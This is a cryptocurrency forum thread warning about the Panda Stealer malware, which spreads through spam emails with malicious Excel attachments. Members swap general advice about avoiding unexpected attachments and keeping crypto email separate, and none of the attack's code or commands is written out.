Author

Topic: {Warning}: New Panda Stealer Targets Cryptocurrency Wallets (Read 235 times)

hero member
Activity: 2520
Merit: 952
Thumb of rule for these type of attacks is to ignore every email with attachment unless you expected it.
hero member
Activity: 3150
Merit: 636
DGbet.fun - Crypto Sportsbook
Sometimes being lazy of opening unsolicited emails are helpful to us. If you don't know the source of an email, you better not open it.

Nothing bad will happen if we open any e-mail we receive, this in itself is not a danger because as far as I know it still takes a little more than just opening an e-mail for something bad to happen. It’s important not to download any attachments that come in such emails, but as they say “curiosity killed a cat”, and people who are curious (and careless) often fall into the trap.

What I would especially like to point out is that you should beware of e-mails that only seemingly come from people you know, because someone can target you specifically - so a legitimate e-mail can be [email protected], and the hacker is sending from [email protected] a message with content that says "look at my latest holiday pictures" just click on attachments.
You're right. There's no danger in opening it but with the example, you've given, that's making a person put him near to the danger that email has attached.

It is okay to be curious but when it comes to attachments, the danger starts especially if the link goes with those informal set of links that they're including and sometimes in file formats that will hit the receiver's curiosity.

But for those that are wanting to avoid them fully and don't want to hit their curiosity, ignoring and deleting them quickly would be the best measure.
legendary
Activity: 3234
Merit: 5637
Blackjack.fun-Free Raffle-Join&Win $50🎲
Sometimes being lazy of opening unsolicited emails are helpful to us. If you don't know the source of an email, you better not open it.

Nothing bad will happen if we open any e-mail we receive, this in itself is not a danger because as far as I know it still takes a little more than just opening an e-mail for something bad to happen. It’s important not to download any attachments that come in such emails, but as they say “curiosity killed a cat”, and people who are curious (and careless) often fall into the trap.

What I would especially like to point out is that you should beware of e-mails that only seemingly come from people you know, because someone can target you specifically - so a legitimate e-mail can be [email protected], and the hacker is sending from [email protected] a message with content that says "look at my latest holiday pictures" just click on attachments.
hero member
Activity: 3150
Merit: 636
DGbet.fun - Crypto Sportsbook
Sometimes being lazy of opening unsolicited emails are helpful to us. If you don't know the source of an email, you better not open it.

And those attachments that are included on those emails, if you don't trust them, never bother yourself to click it.
hero member
Activity: 2800
Merit: 595
https://www.betcoin.ag

Yep spam emails are still being checked by users, you got to be the most naive to really install something that is just attached to an email you found in your inbox. This stealer must have been very zealous to have sent to thousands of email addresses and only get one.

This is why I don't bother opening any mail that I'm not expecting, the only way for this to become active on your PC is clicking which is a bait, OP how about mobile? Can this ticking timebomb mails affect smartphones as well?

I've read the attach article, and I can't find anything mentioning about mobile or smartphones.

However, I wouldn't just be relax here, sooner or later this thread actors will evolved and might create a iteration of the said malware that will target mobile phones too. We all know that they are looking for every opportunity in crypto space because of the potential to hit one victim with crypto's worth millions of dollars.

Sometimes it could go listed on Appstore but there's got to have some reason why someone would install it on their phone.

legendary
Activity: 3080
Merit: 1353
This is why I don't bother opening any mail that I'm not expecting, the only way for this to become active on your PC is clicking which is a bait, OP how about mobile? Can this ticking timebomb mails affect smartphones as well?

I've read the attach article, and I can't find anything mentioning about mobile or smartphones.

However, I wouldn't just be relax here, sooner or later this thread actors will evolved and might create a iteration of the said malware that will target mobile phones too. We all know that they are looking for every opportunity in crypto space because of the potential to hit one victim with crypto's worth millions of dollars.
member
Activity: 248
Merit: 13
Futiracoin.com
This is why I don't bother opening any mail that I'm not expecting, the only way for this to become active on your PC is clicking which is a bait, OP how about mobile? Can this ticking timebomb mails affect smartphones as well?
hero member
Activity: 2282
Merit: 659
Looking for gigs
A new malware was recently discovered last month and being called "Panda Stealer". And mostly they are spread across United States, Australia, Japan and Germany.

Mode of infection

1. Spam email pretending to be a business quote request. And it has an XLS attachment, obviously, it has a malicious content



2. Another attachment, but this time the XLS contained an Excel formula that utilizes a PowerShell command



Cryptocurrencies being targeted and others:

Quote
Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum. Not only does it target cryptocurrency wallets, it can steal credentials from other applications such as NordVPN, Telegram, Discord, and Steam. It’s also capable of taking screenshots of the infected computer and exfiltrating data from browsers like cookies, passwords, and cards.

https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html

So again, be careful even if you are not living on those countries that has been mentioned as the main target for now. The malware might not target bitcoin for now, but for sure this cyber actors are going to evolved. So don't open any attachment specially coming from unknown source.

Now this is really scary and thank you for the heads up. These hackers are trying to be one step ahead of the security measures like what happened in the previous exchange hacking incidents on Binance, etc. So they’ve created this malware and target emails involved in crypto.

And yes, it’s better to have a separate email only for cryptos, and it’s not good to store our private keys or seed phrases there because of this new malware being spread. It could happen in other countries soon. Will tell my crypto friends about this.
legendary
Activity: 3234
Merit: 5637
Blackjack.fun-Free Raffle-Join&Win $50🎲
In that case wouldn't this be mitigated by your firewall blocking the Excel access to the internet altogether and by default?

Most people don't even have an antivirus program, and a firewall is something that the average Joe finds even harder to understand. I know the W10 has its own firewall that is turned on by default, but I'm not sure how well, or badly it does its job. When it comes to educating young people about computer security, I think we are generally in a very bad position - how else to explain so many online scams that have increased even more thanks to the pandemic.

I found an interesting example from Singapore that shows the scale of such activities, so while it’s not solely about whether someone has an AV or a firewall, it still clearly shows that people still can’t distinguish good from bad.
member
Activity: 280
Merit: 28
For ages this warning exists and is being repeated by literally everyone: don't open attachments or click on links in emails, especially emails from unknown sources. I thought by 2021 every internet user would know that but no, there are still people out there who fall for it.
legendary
Activity: 2338
Merit: 10802
There are lies, damned lies and statistics. MTwain
When it talks about two infection chains, I figure it means that it has two alternative deployment methods, one based on an xlsm and the other on an xls (like an A/B test to see which gets better results, or simply a way to diversify the attack).

If either case, the usual should apply, which is don’t fall for the call to action to open the attached email file (xls or xlsm). It doesn’t specify here what the call to action message is, except for the fact that it’s business related (i.e. "Please verify your invoice in the attached file" or so).

This particular malware targets crypto related stuff, which is likely going to be a trend as more people get into the game over time.
legendary
Activity: 3472
Merit: 10611
Am I understanding this correctly that the Email itself doesn't contain the malware but a command that when executed through Excel(?) downloads the actual malware from the internet (paste.ee?), right?
In that case wouldn't this be mitigated by your firewall blocking the Excel access to the internet altogether and by default?
legendary
Activity: 1512
Merit: 4795
Leading Crypto Sports Betting & Casino Platform
Or better yet have a practice to separate our crypto related emails, and other personal emails or throw away emails. So that when we received an email to our crypto related account, that is a red flag already and should be deleted at once.
You are right, but not only crypto users can receive phishing email messages, it can happen to any other email accounts, users data on online platforms can be breached at anytime by hackers which is frequent these days,. Also some people like giving their emails to online platforms in which not even caring knowing if their data are protected or not. For maximum protection against such phishing attack, we need to limit the information we share online and yet not clicking on links on email messages we do not authorized for, but as for me, I do not even open such email message at all.


And there could be people who can fall for this trick, maybe some will open and then they become the next victim here.
Yes, some people can fall for this type of online attack, that is why it is good to only click on email messages you authorized for. We all at one point in time gave out email for certain reasons online, data breach can be from anywhere.
hero member
Activity: 1414
Merit: 542
Not even an email but spam email, that means some people will still go ahead checking spam messages when not authorized to receive an email message. To be on the safe side, it is better to even see many email messages included as spam messages because there are some that can lead to phishing attempts or contain malacious links just like you mentioned. I only click on links that I authorized for because I do not trust any other link. People can be so ridiculous, because of ignorance and greed.

Or better yet have a practice to separate our crypto related emails, and other personal emails or throw away emails. So that when we received an email to our crypto related account, that is a red flag already and should be deleted at once.

And there could be people who can fall for this trick, maybe some will open and then they become the next victim here.
legendary
Activity: 1512
Merit: 4795
Leading Crypto Sports Betting & Casino Platform
Not even an email but spam email, that means some people will still go ahead checking spam messages when not authorized to receive an email message. To be on the safe side, it is better to even see many email messages included as spam messages because there are some that can lead to phishing attempts or contain malacious links just like you mentioned. I only click on links that I authorized for because I do not trust any other link. People can be so ridiculous, because of ignorance and greed.
legendary
Activity: 2576
Merit: 1655
A new malware was recently discovered last month and being called "Panda Stealer". And mostly they are spread across United States, Australia, Japan and Germany.

Mode of infection

1. Spam email pretending to be a business quote request. And it has an XLS attachment, obviously, it has a malicious content



2. Another attachment, but this time the XLS contained an Excel formula that utilizes a PowerShell command



Cryptocurrencies being targeted and others:

Quote
Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum. Not only does it target cryptocurrency wallets, it can steal credentials from other applications such as NordVPN, Telegram, Discord, and Steam. It’s also capable of taking screenshots of the infected computer and exfiltrating data from browsers like cookies, passwords, and cards.

https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html

So again, be careful even if you are not living on those countries that has been mentioned as the main target for now. The malware might not target bitcoin for now, but for sure this cyber actors are going to evolved. So don't open any attachment specially coming from unknown source.
Jump to: